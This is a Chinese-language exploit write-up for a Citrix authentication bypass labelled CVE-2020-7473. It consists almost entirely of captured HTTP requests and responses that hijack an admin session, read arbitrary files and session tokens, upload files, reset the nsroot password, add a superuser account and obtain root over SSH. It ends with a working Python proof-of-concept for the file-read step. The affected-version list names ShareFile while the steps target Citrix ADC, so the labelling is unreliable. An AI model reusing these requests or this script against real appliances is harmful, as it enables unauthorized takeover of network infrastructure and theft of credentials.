(CVE-2020-7473)Citrix 认证绕过getshell
========================================
一、漏洞简介
------------
二、漏洞影响
------------
ShareFile storage zones Controller 5.9.0
ShareFile storage zones Controller 5.8.0
ShareFile storage zones Controller 5.7.0
ShareFile StorageZones Controller 5.6.0
ShareFile StorageZones Controller 5.5.0
及ShareFile StorageZones Controller更早版本
三、复现过程
------------
### 0x01 CreateSession
> request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Range: bytes=0-102400
X-Nitro-Pass: jr9bt
X-Nitro-User: boej3
<appfwprofile><login></login></appfwprofile>
> response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:52:00 GMT
Server: Apache/2.4.34 (Unix)
Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
### 0x02 fix session
> request
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
Range: bytes=0-102400
> response
HTTP/1.1 302 Found
Date: Sun, 12 Jul 2020 07:54:31 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
Content-Length: 416
Connection: close
Content-Type: text/html; charset=UTF-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
### 0x03 Get rand\_key
> request
GET /menu/stc HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
> response
HTTP/1.1 206 Partial Content
Date: Sun, 12 Jul 2020 07:54:35 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Range: bytes 0-4149/4150
Content-Length: 15501
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Statistics</title>
<link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
<script type="text/javascript">
//rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
//rand_key & rand are used in utils.js to avoid CSRF in all POST requests
var rand = "181103693.1594540472072128";
var rand_key = "14247218531594540472072170";
var NSERR_SESSION_EXPIRED = 444;
</script>
...
<p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>
note: var rand = \"181103693.1594540472072128\";
### 0x04 re-break Session
> request
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Content-Length: 44
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
Range: bytes=0-102400
X-NITRO-USER: mMg96GTR
X-NITRO-PASS: QXom91tz
<appfwprofile><login></login></appfwprofile>
> response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 07:54:49 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4489
Connection: close
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
<nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
### 0x05 Read Dir
> request
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
> response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:27:04 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="nstmp"
Accept-Ranges: bytes
Content-Length: 512
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
...
sess_6680400dad3be5585d4ac9880d5f634f...
sess_774dd8a02a254bd09c480cd0ba244598...
sess_6c5c31300c22b200f0273e7a13be47cb....
### 0x06 Read Session
> resquest
POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: python-requests/2.20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: N6RRf049
X-NITRO-PASS: FcdXbqXr
rand_key: 32946879.1594556816473396
Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
Content-Length: 31
<clipermission></clipermission>
> response
HTTP/1.1 406 Not Acceptable
Date: Sun, 12 Jul 2020 12:30:33 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: -1
Cache-Control: private, must-revalidate, post-check=0, pre-check=0
Pragma: private
Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
Accept-Ranges: bytes
Content-Length: 2162
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov 4 2019, 22:20:18 (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";
### 0x07 UploadFile Getshell
You Can Upload to /root/.ssh/authorized\_key Note: Get rand\_key &
SESSID from file:`sess_[32charactor]`
> request
POST /rapi/uploadtext HTTP/1.1
Host: www.0-sec.org:9080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
DNT: 1
rand_key: 845810655.1594556994263502
Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}
> response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 06:15:05 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Length: 34
Content-Type: application/json; charset=utf-8
{"errorcode":"0","message":"Done"}
### 0x08 ChangePassword && SSH
> request
PUT /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
{"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}
> response
HTTP/1.1 200 OK
Date: Sun, 12 Jul 2020 12:37:56 GMT
Server: Apache/2.4.34 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh [email protected]
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost
### 0x09 CreateUser && SSH
> request:CreateUser
POST /nitro/v1/config/systemuser HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}
> response:CreateUser
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:46:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
request:binding superadmin policy
POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
Host: www.0-sec.org:9080
Content-Length: 83
Cache-Control: max-age=0
Accept: application/json
rand_key: 845810655.1594556994263502
NITRO_WEB_APPLICATION: true
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
Connection: close
object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}
response:binding superadmin policy
HTTP/1.1 201 Created
Date: Sun, 12 Jul 2020 12:55:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
X-XSS-Protection: 1; mode=block
Content-Length: 57
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8
{ "errorcode": 0, "message": "Done", "severity": "NONE" }
SSH
ssh [email protected]
###############################################################################
# #
# WARNING: Access to this system is for authorized users only #
# Disconnect IMMEDIATELY if you are not an authorized user! #
# #
###############################################################################
Password:
Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
Done
> shell
Copyright (c) 1992-2013 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
root@localhost#
### poc
3.png
#!/usr/bin/env python
import requests
import sys
import string
import random
import json
from urllib.parse import quote
requests.packages.urllib3.disable_warnings()
def random_string(length=8):
chars = string.ascii_letters + string.digits
random_string = ''.join(random.choice(chars) for x in range(length))
return random_string
def create_session(base_url, session):
url = '{0}/pcidss/report'.format(base_url)
params = {
'type':'allprofiles',
'sid':'loginchallengeresponse1requestbody',
'username':'nsroot',
'set':'1'
}
headers = {
'Content-Type':'application/xml',
'X-NITRO-USER':random_string(),
'X-NITRO-PASS':random_string(),
}
data = '<appfwprofile><login></login></appfwprofile>'
proxies = {"http":"http://127.0.0.1:8080/"}
session.post(url=url, params=params, headers=headers, data=data, verify=False,proxies=proxies)
return session
def fix_session(base_url, session):
url = '{0}/menu/ss'.format(base_url)
params = {
'sid':'nsroot',
'username':'nsroot',
'force_setup':'1'
}
proxies = {"http":"http://127.0.0.1:8080/"}
session.get(url=url, params=params, verify=False,proxies=proxies)
def get_rand(base_url, session):
url = '{0}/menu/stc'.format(base_url)
proxies = {"http":"http://127.0.0.1:8080/"}
r = session.get(url=url, verify=False,proxies=proxies)
for line in r.text.split('\n'):
if 'var rand =' in line:
rand = line.split('"')[1]
return rand
def do_lfi(base_url, session, rand):
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
headers = {
'Content-Type':'application/xml',
'X-NITRO-USER':random_string(),
'X-NITRO-PASS':random_string(),
'rand_key':rand
}
data = '<clipermission></clipermission>'
proxies = {"http":"http://127.0.0.1:8080/"}
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
print ("[+] Send Success!")
print ("_"*80,"\n\n")
print (r.text)
print ("_"*80)
while 1:
PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8")
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1)
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
print ("_"*80,"\n\n")
print (r.text)
print ("_"*80)
# pass
else:
print ("[+] Error!")
def main(base_url):
print ('[-] Creating session..')
session = requests.Session()
create_session(base_url, session)
print ('[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))
print('[-] Fixing session..')
fix_session(base_url, session)
print ('[-] Getting rand..')
rand = get_rand(base_url, session)
print ('[+] Got rand: {0}'.format(rand))
print ('[-] Re-breaking session..')
create_session(base_url, session)
print ('[-] Getting file..')
do_lfi(base_url, session, rand)
if __name__ == '__main__':
# Slashes need to be urlencoded
base_url = sys.argv[1]
if base_url[-1] == '/':
base_url = base_url[:-1]
else:
base_url = base_url
# PAYLOAD='%2fetc%2fpasswd'
PAYLOAD = quote(input("[+] Set File= "),"utf-8")
main(base_url)